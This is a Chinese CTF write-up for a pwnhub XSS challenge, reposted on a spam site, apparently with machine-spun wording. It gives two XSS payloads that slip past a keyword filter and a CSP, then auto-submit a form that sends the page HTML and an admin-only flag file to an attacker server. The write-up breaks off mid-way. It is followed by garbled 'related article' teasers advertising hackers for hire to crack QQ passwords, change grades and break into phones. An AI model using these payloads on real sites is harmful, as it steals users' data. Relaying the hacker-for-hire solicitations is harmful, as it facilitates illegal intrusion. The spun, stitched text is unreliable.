pwnhub -- 肯定防护 writeup

访客5年前黑客资讯976

 周末做了一道关于我来说很蛋疼的标题...可是看了各位师傅的writeup就觉得自己的思路太窄了....

标题地址:https://pwnhub.cn/gamedetail?id=13

注册之后有个留言板,有CSP(不允许对外发送恳求),通过测验只过滤一次某些单次,如:on,oonn就能过。

用表单来绕过csp回来页面到我的服务器上,看到提示

poc:

<imong src=x oonnerror="var htmlstr = document.getElementsByTagName('html')[0].innerHTML;$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/hub1'+ escape(htmlstr)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')">

转码后发现提示( http://zone.secevery.com/code/index.html 在线编码转码...之前写的辣鸡程序...):

拜访http://52.80.63.91/adminshigesha233e3333/ 提示flag.php

拜访flag.php 提示只要admin能看....

测验盲打admin回来flag.php的内容.

poc:

<imong src=x oonnerror="$.get('/adminshigesha233e3333/flag.php', functioonn(data){$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/'+ escape(data)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')})">

提示:nothing here,╮(╯-╰)╭,what ever you try, only from adminshigesha233e3333 can read it...

http://52.80.63.91/adminshigesha233e3333/

PS:在这里卡了一天多,在各种测验加header拜访,get拜访,post拜访,各种蛋疼,测到深夜的时分标题后端挂了...

检查源码:

[1] [2]  黑客接单网

相关文章

聊一聊随机数安全

和朋友聊到一个比较有意思的现象,在最近两年的校招面试中,大部分同学连一点根底的暗码学知识都没有, 即便是有一些浸透功底的同学。 所以这儿想和咱们聊一些简略的暗码学根底知识,不触及算法完成,更多的是和常...

用电话号码找人,找黑客修改成绩 找黑客入侵网站,找黑客代价

点击 [会员] 菜单,咱们能够看到当时有两个用户,一个是管理员admin,另一个是test1;Save Out File 勾选上$query = 'select name, district from...

我儿子爱赌博请老师帮我挽回他

%DOMAIN_HOME%serversAdminServertmp_WL_internalroot@vultr:~# cat check 临时解决建议%DOMAIN_HOME%serversAdmi...

怎么破解别人手机指纹,解放军美女找黑客小伙,如何找黑客破解qq密码软件

of Compromise,攻陷指标)咱们将做含糊处理。 一切IOC现已整合到东巽的铁穹产品和东巽要挟情报中心,您可拜访以下网址进行查询:https://ti.dongxuntech.com...

出名的黑客接单吗,网上找黑客被要求付定金,黑客找qq的视频下载

print 'response code: ' + str(r.status_code)尽管这个问题在06年就提出来了。 在11年的时分有了好几个优异的paper来研讨这个问题。 可是这个缝隙从来没有...

中国最大的黑客接单,找计算机黑客,1500找黑客改分

在IDA里,咱们能够看到木马运用的手法:default-lease-time 600;(存在上传缝隙)stdout = new PrintWriter(callbacks.getStdout(), t...